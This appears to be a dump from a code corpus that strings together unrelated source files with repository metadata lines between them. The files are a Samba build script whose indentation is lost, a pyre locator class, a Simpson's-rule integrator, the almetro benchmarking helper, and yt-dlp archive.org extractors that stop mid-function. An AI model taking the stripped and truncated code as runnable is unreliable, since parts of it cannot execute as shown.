extra_conf.append("--disable-cups")
extra_conf.append("--disable-iprint")
extra_conf.append("--disable-avahi")
'''
extra_conf.append("--disable-python")
extra_conf.append("--without-ad-dc")
extra_conf.append("--without-acl-support")
extra_conf.append("--without-ldap")
extra_conf.append("--without-ads")
extra_conf.append("--without-pam")
extra_conf.append("--without-gettext")
extra_conf.append("--jobs=" + job_count)
extra_conf.append("--without-systemd")
extra_conf.append("--without-regedit")
extra_conf.append("--without-cluster-support")
extra_conf.append("--without-ntvfs-fileserver")
extra_conf.append("--without-winbind")
extra_conf.append("--disable-glusterfs")
extra_conf.append("--disable-cups")
extra_conf.append("--disable-iprint")
extra_conf.append("--disable-avahi")
extra_conf.append("--without-automount")
extra_conf.append("--without-dnsupdate")
extra_conf.append("--without-fam")
extra_conf.append("--without-dmapi")
extra_conf.append("--without-quotas")
extra_conf.append("--without-profiling-data")
extra_conf.append("--without-utmp")
extra_conf.append("--without-libarchive")
#extra_conf.append("--enable-developer")
    print(extra_conf)
#iopc.waf(tarball_dir, extra_conf)
iopc.configure(tarball_dir, extra_conf)
return True
def MAIN_BUILD(args):
set_global(args)
ops.mkdir(install_dir)
ops.mkdir(install_tmp_dir)
iopc.make(tarball_dir)
iopc.make_install(tarball_dir)
ops.mkdir(install_dir)
ops.mkdir(dst_lib_dir)
ops.mkdir(dst_bin_dir)
ops.mkdir(dst_usr_local_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/sbin/nmbd"), dst_bin_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/sbin/smbd"), dst_bin_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libdcerpc-binding.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libdcerpc-binding.so.0.0.1", "libdcerpc-binding.so.0.0")
ops.ln(dst_lib_dir, "libdcerpc-binding.so.0.0.1", "libdcerpc-binding.so.0")
ops.ln(dst_lib_dir, "libdcerpc-binding.so.0.0.1", "libdcerpc-binding.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libdcerpc-samr.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libdcerpc-samr.so.0.0.1", "libdcerpc-samr.so.0.0")
ops.ln(dst_lib_dir, "libdcerpc-samr.so.0.0.1", "libdcerpc-samr.so.0")
ops.ln(dst_lib_dir, "libdcerpc-samr.so.0.0.1", "libdcerpc-samr.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libdcerpc.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libdcerpc.so.0.0.1", "libdcerpc.so.0.0")
ops.ln(dst_lib_dir, "libdcerpc.so.0.0.1", "libdcerpc.so.0")
ops.ln(dst_lib_dir, "libdcerpc.so.0.0.1", "libdcerpc.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr-krb5pac.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr-krb5pac.so.0.0.1", "libndr-krb5pac.so.0.0")
ops.ln(dst_lib_dir, "libndr-krb5pac.so.0.0.1", "libndr-krb5pac.so.0")
ops.ln(dst_lib_dir, "libndr-krb5pac.so.0.0.1", "libndr-krb5pac.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr-nbt.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr-nbt.so.0.0.1", "libndr-nbt.so.0.0")
ops.ln(dst_lib_dir, "libndr-nbt.so.0.0.1", "libndr-nbt.so.0")
ops.ln(dst_lib_dir, "libndr-nbt.so.0.0.1", "libndr-nbt.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr.so.0.1.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr.so.0.1.0", "libndr.so.0.1")
ops.ln(dst_lib_dir, "libndr.so.0.1.0", "libndr.so.0")
ops.ln(dst_lib_dir, "libndr.so.0.1.0", "libndr.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libndr-standard.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libndr-standard.so.0.0.1", "libndr-standard.so.0.0")
ops.ln(dst_lib_dir, "libndr-standard.so.0.0.1", "libndr-standard.so.0")
ops.ln(dst_lib_dir, "libndr-standard.so.0.0.1", "libndr-standard.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libnetapi.so.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libnetapi.so.0", "libnetapi.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libnss_winbind.so.2"), dst_lib_dir)
ops.ln(dst_lib_dir, "libnss_winbind.so.2", "libnss_winbind.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libnss_wins.so.2"), dst_lib_dir)
ops.ln(dst_lib_dir, "libnss_wins.so.2", "libnss_wins.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-credentials.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-credentials.so.0.0.1", "libsamba-credentials.so.0.0")
ops.ln(dst_lib_dir, "libsamba-credentials.so.0.0.1", "libsamba-credentials.so.0")
ops.ln(dst_lib_dir, "libsamba-credentials.so.0.0.1", "libsamba-credentials.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-errors.so.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-errors.so.1", "libsamba-errors.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-hostconfig.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-hostconfig.so.0.0.1", "libsamba-hostconfig.so.0.0")
ops.ln(dst_lib_dir, "libsamba-hostconfig.so.0.0.1", "libsamba-hostconfig.so.0")
ops.ln(dst_lib_dir, "libsamba-hostconfig.so.0.0.1", "libsamba-hostconfig.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-passdb.so.0.27.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-passdb.so.0.27.0", "libsamba-passdb.so.0.27")
ops.ln(dst_lib_dir, "libsamba-passdb.so.0.27.0", "libsamba-passdb.so.0")
ops.ln(dst_lib_dir, "libsamba-passdb.so.0.27.0", "libsamba-passdb.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamba-util.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamba-util.so.0.0.1", "libsamba-util.so.0.0")
ops.ln(dst_lib_dir, "libsamba-util.so.0.0.1", "libsamba-util.so.0")
ops.ln(dst_lib_dir, "libsamba-util.so.0.0.1", "libsamba-util.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsamdb.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsamdb.so.0.0.1", "libsamdb.so.0.0")
ops.ln(dst_lib_dir, "libsamdb.so.0.0.1", "libsamdb.so.0")
ops.ln(dst_lib_dir, "libsamdb.so.0.0.1", "libsamdb.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsmbclient.so.0.3.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsmbclient.so.0.3.1", "libsmbclient.so.0.3")
ops.ln(dst_lib_dir, "libsmbclient.so.0.3.1", "libsmbclient.so.0")
ops.ln(dst_lib_dir, "libsmbclient.so.0.3.1", "libsmbclient.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libsmbconf.so.0"), dst_lib_dir)
ops.ln(dst_lib_dir, "libsmbconf.so.0", "libsmbconf.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libtevent-util.so.0.0.1"), dst_lib_dir)
ops.ln(dst_lib_dir, "libtevent-util.so.0.0.1", "libtevent-util.so.0.0")
ops.ln(dst_lib_dir, "libtevent-util.so.0.0.1", "libtevent-util.so.0")
ops.ln(dst_lib_dir, "libtevent-util.so.0.0.1", "libtevent-util.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/libwbclient.so.0.14"), dst_lib_dir)
ops.ln(dst_lib_dir, "libwbclient.so.0.14", "libwbclient.so.0")
ops.ln(dst_lib_dir, "libwbclient.so.0.14", "libwbclient.so")
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/winbind_krb5_locator.so"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/private/."), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/auth"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/idmap"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/ldb"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/nss_info"), dst_lib_dir)
ops.copyto(ops.path_join(install_tmp_dir, "usr/local/samba/lib/vfs"), dst_lib_dir)
ops.ln(dst_usr_local_dir, "/tmp/samba", "samba")
return True
def MAIN_INSTALL(args):
set_global(args)
iopc.installBin(args["pkg_name"], ops.path_join(dst_lib_dir, "."), "lib")
iopc.installBin(args["pkg_name"], ops.path_join(dst_bin_dir, "."), "usr/sbin")
iopc.installBin(args["pkg_name"], ops.path_join(dst_usr_local_dir, "."), "usr/local")
#iopc.installBin(args["pkg_name"], ops.path_join(tmp_include_dir, "."), dst_include_dir)
#iopc.installBin(args["pkg_name"], ops.path_join(dst_pkgconfig_dir, '.'), "pkgconfig")
return False
def MAIN_SDKENV(args):
set_global(args)
return False
def MAIN_CLEAN_BUILD(args):
set_global(args)
return False
def MAIN(args):
set_global(args)
| 2.140625 | 2 |
packages/pyre/tracking/Chain.py | lijun99/pyre | 3 | 11342 | <reponame>lijun99/pyre
# -*- coding: utf-8 -*-
#
# <NAME>. aïvázis
# orthologue
# (c) 1998-2019 all rights reserved
#
# declaration
class Chain:
"""
A locator that ties together two others in order to express that something in {next}
caused {this} to be recorded
"""
# meta methods
def __init__(self, this, next):
self.this = this
self.next = next
return
def __str__(self):
# if {next} is non-trivial, show the chain
if self.next: return "{0.this}, {0.next}".format(self)
# otherwise don't
return "{0.this}".format(self)
# implementation details
__slots__ = "this", "next"
# end of file
| 2.859375 | 3 |
tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 3 | 11343 | import os
x = 7
print(x + 1)
| 1.914063 | 2 |
Mod 03/03 Prova.py | SauloCav/CN | 0 | 11344 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
import math
def f(x):
return math.exp(x)/x**3
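# Note (added comment): int() below implements the composite Simpson's rule on
# [a, b] with 104 equal subintervals (h = (b - a)/104). The 52 terms accumulated
# in soma_par are the odd-indexed nodes (weight 4) and the 51 terms in soma_impar
# are the interior even-indexed nodes (weight 2), giving
# (h/3) * (f(a) + f(b) + 4*S_odd + 2*S_even). The par/impar names are swapped
# relative to the node indices, but the arithmetic is correct; note that int()
# also shadows Python's builtin int.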
def int(a,b):
h = (b-a)/104
x_par = a+h
x_impar = a+2*h
soma_par = 0
soma_impar = 0
for i in range(52):
soma_par += f(x_par)
x_par += 2*h
for i in range(51):
soma_impar += f(x_impar)
x_impar += 2*h
return (f(a)+f(b) + 4 * soma_par + 2*soma_impar) *h/3
print(int(1.9,9.7))
| 3.59375 | 4 |
almetro/al.py | arnour/almetro | 0 | 11345 | <gh_stars>0
from almetro.instance import growing
from almetro.metro import Metro
import timeit
class ExecutionSettings:
def __init__(self, trials=1, runs=1):
if not trials or trials < 1:
raise TypeError('#trials must be provided')
if not runs or runs < 1:
raise TypeError('#runs must be provided')
self.trials = trials
self.runs = runs
@staticmethod
def new():
return ExecutionSettings()
class InstanceSettings:
def __init__(self, instances=1, provider=growing()):
if not instances:
raise TypeError('#instances must be provided')
if not provider:
raise TypeError('provider must be provided')
self.instances = instances
self.provider = provider
@staticmethod
def new():
return InstanceSettings()
class Al:
def __init__(self, instance_settings=InstanceSettings.new(), execution_settings=ExecutionSettings.new()):
if not instance_settings:
raise TypeError('instance settings must be provided')
if not execution_settings:
raise TypeError('execution settings must be provided')
self.__instance_settings = instance_settings
self.__execution_settings = execution_settings
def with_instances(self, instances, provider):
return Al(instance_settings=InstanceSettings(instances, provider), execution_settings=self.__execution_settings)
def with_execution(self, trials, runs=1):
return Al(instance_settings=self.__instance_settings, execution_settings=ExecutionSettings(trials, runs))
def metro(self, algorithm, complexity):
metro = Metro.new(complexity)
for _ in range(self.__instance_settings.instances):
instance = self.__instance_settings.provider.new_instance()
def runner():
algorithm(**instance.value)
metro.register(instance, timeit.repeat(runner, number=self.__execution_settings.runs, repeat=self.__execution_settings.trials))
return metro
| 2.4375 | 2 |
yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | 80 | 11346 | <filename>yt_dlp/extractor/archiveorg.py
# coding: utf-8
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from .youtube import YoutubeIE, YoutubeBaseInfoExtractor
from ..compat import (
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_HTTPError
)
from ..utils import (
bug_reports_message,
clean_html,
dict_get,
extract_attributes,
ExtractorError,
get_element_by_id,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
merge_dicts,
mimetype2ext,
orderedSet,
parse_duration,
parse_qs,
str_to_int,
str_or_none,
traverse_obj,
try_get,
unified_strdate,
unified_timestamp,
urlhandle_detect_ext,
url_or_none
)
class ArchiveOrgIE(InfoExtractor):
IE_NAME = 'archive.org'
IE_DESC = 'archive.org video and audio'
_VALID_URL = r'https?://(?:www\.)?archive\.org/(?:details|embed)/(?P<id>[^?#]+)(?:[?].*)?$'
_TESTS = [{
'url': 'http://archive.org/details/XD300-23_68HighlightsAResearchCntAugHumanIntellect',
'md5': '8af1d4cf447933ed3c7f4871162602db',
'info_dict': {
'id': 'XD300-23_68HighlightsAResearchCntAugHumanIntellect',
'ext': 'ogv',
'title': '1968 Demo - FJCC Conference Presentation Reel #1',
'description': 'md5:da45c349df039f1cc8075268eb1b5c25',
'release_date': '19681210',
'timestamp': 1268695290,
'upload_date': '20100315',
'creator': 'SRI International',
'uploader': '<EMAIL>',
},
}, {
'url': 'https://archive.org/details/Cops1922',
'md5': '0869000b4ce265e8ca62738b336b268a',
'info_dict': {
'id': 'Cops1922',
'ext': 'mp4',
'title': 'Buster Keaton\'s "Cops" (1922)',
'description': 'md5:43a603fd6c5b4b90d12a96b921212b9c',
'uploader': '<EMAIL>',
'timestamp': 1387699629,
'upload_date': "20131222",
},
}, {
'url': 'http://archive.org/embed/XD300-23_68HighlightsAResearchCntAugHumanIntellect',
'only_matching': True,
}, {
'url': 'https://archive.org/details/Election_Ads',
'md5': '284180e857160cf866358700bab668a3',
'info_dict': {
'id': 'Election_Ads/Commercial-JFK1960ElectionAdCampaignJingle.mpg',
'title': 'Commercial-JFK1960ElectionAdCampaignJingle.mpg',
'ext': 'mp4',
},
}, {
'url': 'https://archive.org/details/Election_Ads/Commercial-Nixon1960ElectionAdToughonDefense.mpg',
'md5': '7915213ef02559b5501fe630e1a53f59',
'info_dict': {
'id': 'Election_Ads/Commercial-Nixon1960ElectionAdToughonDefense.mpg',
'title': 'Commercial-Nixon1960ElectionAdToughonDefense.mpg',
'ext': 'mp4',
'timestamp': 1205588045,
'uploader': '<EMAIL>',
'description': '1960 Presidential Campaign Election Commercials <NAME>, <NAME>',
'upload_date': '20080315',
},
}, {
'url': 'https://archive.org/details/gd1977-05-08.shure57.stevenson.29303.flac16',
'md5': '7d07ffb42aba6537c28e053efa4b54c9',
'info_dict': {
'id': 'gd1977-05-08.shure57.stevenson.29303.flac16/gd1977-05-08d01t01.flac',
'title': 'Turning',
'ext': 'flac',
},
}, {
'url': 'https://archive.org/details/gd1977-05-08.shure57.stevenson.29303.flac16/gd1977-05-08d01t07.flac',
'md5': 'a07cd8c6ab4ee1560f8a0021717130f3',
'info_dict': {
'id': 'gd1977-05-08.shure57.stevenson.29303.flac16/gd1977-05-08d01t07.flac',
'title': 'Deal',
'ext': 'flac',
'timestamp': 1205895624,
'uploader': '<EMAIL>',
'description': 'md5:6a31f1996db0aa0fc9da6d6e708a1bb0',
'upload_date': '20080319',
'location': 'Barton Hall - Cornell University',
},
}, {
'url': 'https://archive.org/details/lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik',
'md5': '7cb019baa9b332e82ea7c10403acd180',
'info_dict': {
'id': 'lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik/disc1/01.01. Bells Of Rostov.mp3',
'title': 'Bells Of Rostov',
'ext': 'mp3',
},
}, {
'url': 'https://archive.org/details/lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik/disc1/02.02.+Song+And+Chorus+In+The+Polovetsian+Camp+From+%22Prince+Igor%22+(Act+2%2C+Scene+1).mp3',
'md5': '1d0aabe03edca83ca58d9ed3b493a3c3',
'info_dict': {
'id': 'lp_the-music-of-russia_various-artists-a-askaryan-alexander-melik/disc1/02.02. Song And Chorus In The Polovetsian Camp From "Prince Igor" (Act 2, Scene 1).mp3',
'title': 'Song And Chorus In The Polovetsian Camp From "Prince Igor" (Act 2, Scene 1)',
'ext': 'mp3',
'timestamp': 1569662587,
'uploader': '<EMAIL>',
'description': 'md5:012b2d668ae753be36896f343d12a236',
'upload_date': '20190928',
},
}]
@staticmethod
def _playlist_data(webpage):
element = re.findall(r'''(?xs)
<input
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
\s+class=['"]?js-play8-playlist['"]?
(?:\s+[a-zA-Z0-9:._-]+(?:=[a-zA-Z0-9:._-]*|="[^"]*"|='[^']*'|))*?
\s*/>
''', webpage)[0]
return json.loads(extract_attributes(element)['value'])
def _real_extract(self, url):
video_id = compat_urllib_parse_unquote_plus(self._match_id(url))
identifier, entry_id = (video_id.split('/', 1) + [None])[:2]
# Archive.org metadata API doesn't clearly demarcate playlist entries
# or subtitle tracks, so we get them from the embeddable player.
embed_page = self._download_webpage(
'https://archive.org/embed/' + identifier, identifier)
playlist = self._playlist_data(embed_page)
entries = {}
for p in playlist:
# If the user specified a playlist entry in the URL, ignore the
# rest of the playlist.
if entry_id and p['orig'] != entry_id:
continue
entries[p['orig']] = {
'formats': [],
'thumbnails': [],
'artist': p.get('artist'),
'track': p.get('title'),
'subtitles': {}}
for track in p.get('tracks', []):
if track['kind'] != 'subtitles':
continue
                entries[p['orig']]['subtitles'][track['label']] = [{
                    'url': 'https://archive.org/' + track['file'].lstrip('/')}]
metadata = self._download_json(
'http://archive.org/metadata/' + identifier, identifier)
m = metadata['metadata']
identifier = m['identifier']
info = {
'id': identifier,
'title': m['title'],
'description': clean_html(m.get('description')),
'uploader': dict_get(m, ['uploader', 'adder']),
'creator': m.get('creator'),
'license': m.get('licenseurl'),
'release_date': unified_strdate(m.get('date')),
'timestamp': unified_timestamp(dict_get(m, ['publicdate', 'addeddate'])),
'webpage_url': 'https://archive.org/details/' + identifier,
'location': m.get('venue'),
'release_year': int_or_none(m.get('year'))}
for f in metadata['files']:
if f['name'] in entries:
entries[f['name']] = merge_dicts(entries[f['name']], {
'id': identifier + '/' + f['name'],
'title': f.get('title') or f['name'],
'display_id': f['name'],
'description': clean_html(f.get('description')),
'creator': f.get('creator'),
'duration': parse_duration(f.get('length')),
'track_number': int_or_none(f.get('track')),
'album': f.get('album'),
'discnumber': int_or_none(f.get('disc')),
'release_year': int_or_none(f.get('year'))})
entry = entries[f['name']]
elif f.get('original') in entries:
entry = entries[f['original']]
else:
continue
if f.get('format') == 'Thumbnail':
entry['thumbnails'].append({
'id': f['name'],
'url': 'https://archive.org/download/' + identifier + '/' + f['name'],
'width': int_or_none(f.get('width')),
                    'height': int_or_none(f.get('height')),
'filesize': int_or_none(f.get('size'))})
extension = (f['name'].rsplit('.', 1) + [None])[1]
if extension in KNOWN_EXTENSIONS:
entry['formats'].append({
'url': 'https://archive.org/download/' + identifier + '/' + f['name'],
'format': f.get('format'),
'width': int_or_none(f.get('width')),
'height': int_or_none(f.get('height')),
'filesize': int_or_none(f.get('size')),
'protocol': 'https'})
# Sort available formats by filesize
for entry in entries.values():
entry['formats'] = list(sorted(entry['formats'], key=lambda x: x.get('filesize', -1)))
if len(entries) == 1:
# If there's only one item, use it as the main info dict
only_video = entries[list(entries.keys())[0]]
if entry_id:
info = merge_dicts(only_video, info)
else:
info = merge_dicts(info, only_video)
else:
# Otherwise, we have a playlist.
info['_type'] = 'playlist'
info['entries'] = list(entries.values())
if metadata.get('reviews'):
info['comments'] = []
for review in metadata['reviews']:
info['comments'].append({
'id': review.get('review_id'),
'author': review.get('reviewer'),
'text': str_or_none(review.get('reviewtitle'), '') + '\n\n' + review.get('reviewbody'),
'timestamp': unified_timestamp(review.get('createdate')),
'parent': 'root'})
return info
class YoutubeWebArchiveIE(InfoExtractor):
IE_NAME = 'web.archive:youtube'
IE_DESC = 'web.archive.org saved youtube videos'
_VALID_URL = r"""(?x)^
(?:https?://)?web\.archive\.org/
(?:web/)?
(?:(?P<date>[0-9]{14})?[0-9A-Za-z_*]*/)? # /web and the version index is optional
(?:https?(?::|%3[Aa])//)?
(?:
(?:\w+\.)?youtube\.com(?::(?:80|443))?/watch(?:\.php)?(?:\?|%3[fF])(?:[^\#]+(?:&|%26))?v(?:=|%3[dD]) # Youtube URL
|(?:wayback-fakeurl\.archive\.org/yt/) # Or the internal fake url
)
(?P<id>[0-9A-Za-z_-]{11})(?:%26|\#|&|$)
"""
_TESTS = [
{
'url': 'https://web.archive.org/web/20150415002341/https://www.youtube.com/watch?v=aYAGB11YrSs',
'info_dict': {
'id': 'aYAGB11YrSs',
'ext': 'webm',
'title': 'Team Fortress 2 - Sandviches!',
'description': 'md5:4984c0f9a07f349fc5d8e82ab7af4eaf',
'upload_date': '20110926',
'uploader': 'Zeurel',
'channel_id': 'UCukCyHaD-bK3in_pKpfH9Eg',
'duration': 32,
'uploader_id': 'Zeurel',
'uploader_url': 'http://www.youtube.com/user/Zeurel'
}
}, {
# Internal link
'url': 'https://web.archive.org/web/2oe/http://wayback-fakeurl.archive.org/yt/97t7Xj_iBv0',
'info_dict': {
'id': '97t7Xj_iBv0',
'ext': 'mp4',
'title': 'Why Machines That Bend Are Better',
'description': 'md5:00404df2c632d16a674ff8df1ecfbb6c',
'upload_date': '20190312',
'uploader': 'Veritasium',
'channel_id': 'UCHnyfMqiRRG1u-2MsSQLbXA',
'duration': 771,
'uploader_id': '1veritasium',
'uploader_url': 'http://www.youtube.com/user/1veritasium'
}
}, {
# Video from 2012, webm format itag 45. Newest capture is deleted video, with an invalid description.
# Should use the date in the link. Title ends with '- Youtube'. Capture has description in eow-description
'url': 'https://web.archive.org/web/20120712231619/http://www.youtube.com/watch?v=AkhihxRKcrs&gl=US&hl=en',
'info_dict': {
'id': 'AkhihxRKcrs',
'ext': 'webm',
'title': 'Limited Run: Mondo\'s Modern Classic 1 of 3 (SDCC 2012)',
'upload_date': '20120712',
'duration': 398,
'description': 'md5:ff4de6a7980cb65d951c2f6966a4f2f3',
'uploader_id': 'machinima',
'uploader_url': 'http://www.youtube.com/user/machinima'
}
}, {
# FLV video. Video file URL does not provide itag information
'url': 'https://web.archive.org/web/20081211103536/http://www.youtube.com/watch?v=jNQXAC9IVRw',
'info_dict': {
'id': 'jNQXAC9IVRw',
'ext': 'flv',
'title': 'Me at the zoo',
'upload_date': '20050423',
'channel_id': 'UC4QobU6STFB0P71PMvOGN5A',
'duration': 19,
'description': 'md5:10436b12e07ac43ff8df65287a56efb4',
'uploader_id': 'jawed',
'uploader_url': 'http://www.youtube.com/user/jawed'
}
}, {
'url': 'https://web.archive.org/web/20110712231407/http://www.youtube.com/watch?v=lTx3G6h2xyA',
'info_dict': {
'id': 'lTx3G6h2xyA',
'ext': 'flv',
'title': 'Madeon - Pop Culture (live mashup)',
'upload_date': '20110711',
'uploader': 'Madeon',
'channel_id': 'UCqMDNf3Pn5L7pcNkuSEeO3w',
'duration': 204,
'description': 'md5:f7535343b6eda34a314eff8b85444680',
'uploader_id': 'itsmadeon',
'uploader_url': 'http://www.youtube.com/user/itsmadeon'
}
}, {
# First capture is of dead video, second is the oldest from CDX response.
'url': 'https://web.archive.org/https://www.youtube.com/watch?v=1JYutPM8O6E',
'info_dict': {
'id': '1JYutPM8O6E',
'ext': 'mp4',
'title': 'Fake Teen Doctor Strikes AGAIN! - Weekly Weird News',
'upload_date': '20160218',
'channel_id': 'UCdIaNUarhzLSXGoItz7BHVA',
'duration': 1236,
'description': 'md5:21032bae736421e89c2edf36d1936947',
'uploader_id': 'MachinimaETC',
'uploader_url': 'http://www.youtube.com/user/MachinimaETC'
}
}, {
# First capture of dead video, capture date in link links to dead capture.
'url': 'https://web.archive.org/web/20180803221945/https://www.youtube.com/watch?v=6FPhZJGvf4E',
'info_dict': {
'id': '6FPhZJGvf4E',
'ext': 'mp4',
'title': 'WTF: Video Games Still Launch BROKEN?! - T.U.G.S.',
'upload_date': '20160219',
'channel_id': 'UCdIaNUarhzLSXGoItz7BHVA',
'duration': 798,
'description': 'md5:a1dbf12d9a3bd7cb4c5e33b27d77ffe7',
'uploader_id': 'MachinimaETC',
'uploader_url': 'http://www.youtube.com/user/MachinimaETC'
},
'expected_warnings': [
r'unable to download capture webpage \(it may not be archived\)'
]
}, { # Very old YouTube page, has - YouTube in title.
'url': 'http://web.archive.org/web/20070302011044/http://youtube.com/watch?v=-06-KB9XTzg',
'info_dict': {
'id': '-06-KB9XTzg',
'ext': 'flv',
'title': 'New Coin Hack!! 100% Safe!!'
}
}, {
'url': 'web.archive.org/https://www.youtube.com/watch?v=dWW7qP423y8',
'info_dict': {
'id': 'dWW7qP423y8',
'ext': 'mp4',
'title': 'It\'s Bootleg AirPods Time.',
'upload_date': '20211021',
'channel_id': 'UC7Jwj9fkrf1adN4fMmTkpug',
'channel_url': 'http://www.youtube.com/channel/UC7Jwj9fkrf1adN4fMmTkpug',
'duration': 810,
'description': 'md5:7b567f898d8237b256f36c1a07d6d7bc',
'uploader': 'DankPods',
'uploader_id': 'UC7Jwj9fkrf1adN4fMmTkpug',
'uploader_url': 'http://www.youtube.com/channel/UC7Jwj9fkrf1adN4fMmTkpug'
}
}, {
# player response contains '};' See: https://github.com/ytdl-org/youtube-dl/issues/27093
'url': 'https://web.archive.org/web/20200827003909if_/http://www.youtube.com/watch?v=6Dh-RL__uN4',
'info_dict': {
'id': '6Dh-RL__uN4',
'ext': 'mp4',
'title': 'bitch lasagna',
'upload_date': '20181005',
'channel_id': 'UC-lHJZR3Gqxm24_Vd_AJ5Yw',
'channel_url': 'http://www.youtube.com/channel/UC-lHJZR3Gqxm24_Vd_AJ5Yw',
'duration': 135,
'description': 'md5:2dbe4051feeff2dab5f41f82bb6d11d0',
'uploader': 'PewDiePie',
'uploader_id': 'PewDiePie',
'uploader_url': 'http://www.youtube.com/user/PewDiePie'
}
}, {
'url': 'https://web.archive.org/web/http://www.youtube.com/watch?v=kH-G_aIBlFw',
'only_matching': True
}, {
'url': 'https://web.archive.org/web/20050214000000_if/http://www.youtube.com/watch?v=0altSZ96U4M',
'only_matching': True
}, {
# Video not archived, only capture is unavailable video page
'url': 'https://web.archive.org/web/20210530071008/https://www.youtube.com/watch?v=lHJTf93HL1s&spfreload=10',
'only_matching': True
}, { # Encoded url
'url': 'https://web.archive.org/web/20120712231619/http%3A//www.youtube.com/watch%3Fgl%3DUS%26v%3DAkhihxRKcrs%26hl%3Den',
'only_matching': True
}, {
'url': 'https://web.archive.org/web/20120712231619/http%3A//www.youtube.com/watch%3Fv%3DAkhihxRKcrs%26gl%3DUS%26hl%3Den',
'only_matching': True
}, {
'url': 'https://web.archive.org/web/20060527081937/http://www.youtube.com:80/watch.php?v=ELTFsLT73fA&search=soccer',
'only_matching': True
}, {
'url': 'https://web.archive.org/http://www.youtube.com:80/watch?v=-05VVye-ffg',
'only_matching': True
}
]
_YT_INITIAL_DATA_RE = r'(?:(?:(?:window\s*\[\s*["\']ytInitialData["\']\s*\]|ytInitialData)\s*=\s*({.+?})\s*;)|%s)' % YoutubeBaseInfoExtractor._YT_INITIAL_DATA_RE
_YT_INITIAL_PLAYER_RESPONSE_RE = r'(?:(?:(?:window\s*\[\s*["\']ytInitialPlayerResponse["\']\s*\]|ytInitialPlayerResponse)\s*=[(\s]*({.+?})[)\s]*;)|%s)' % YoutubeBaseInfoExtractor._YT_INITIAL_PLAYER_RESPONSE_RE
_YT_INITIAL_BOUNDARY_RE = r'(?:(?:var\s+meta|</script|\n)|%s)' % YoutubeBaseInfoExtractor._YT_INITIAL_BOUNDARY_RE
_YT_DEFAULT_THUMB_SERVERS = ['i.ytimg.com'] # thumbnails most likely archived on these servers
_YT_ALL_THUMB_SERVERS = orderedSet(
_YT_DEFAULT_THUMB_SERVERS + ['img.youtube.com', *[f'{c}{n or ""}.ytimg.com' for c in ('i', 's') for n in (*range(0, 5), 9)]])
_WAYBACK_BASE_URL = 'https://web.archive.org/web/%sif_/'
_OLDEST_CAPTURE_DATE = 20050214000000
_NEWEST_CAPTURE_DATE = 20500101000000
def _call_cdx_api(self, item_id, url, filters: list = None, collapse: list = None, query: dict = None, note='Downloading CDX API JSON'):
# CDX docs: https://github.com/internetarchive/wayback/blob/master/wayback-cdx-server/README.md
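        # Shape note (added): with output=json the endpoint returns a list whose
        # first row is the requested field names and whose remaining rows are the
        # matching captures, e.g. (values illustrative only):
        #   [["original", "mimetype", "length", "timestamp"],
        #    ["http://www.youtube.com/watch?v=...", "text/html", "12345", "20200701000000"]]
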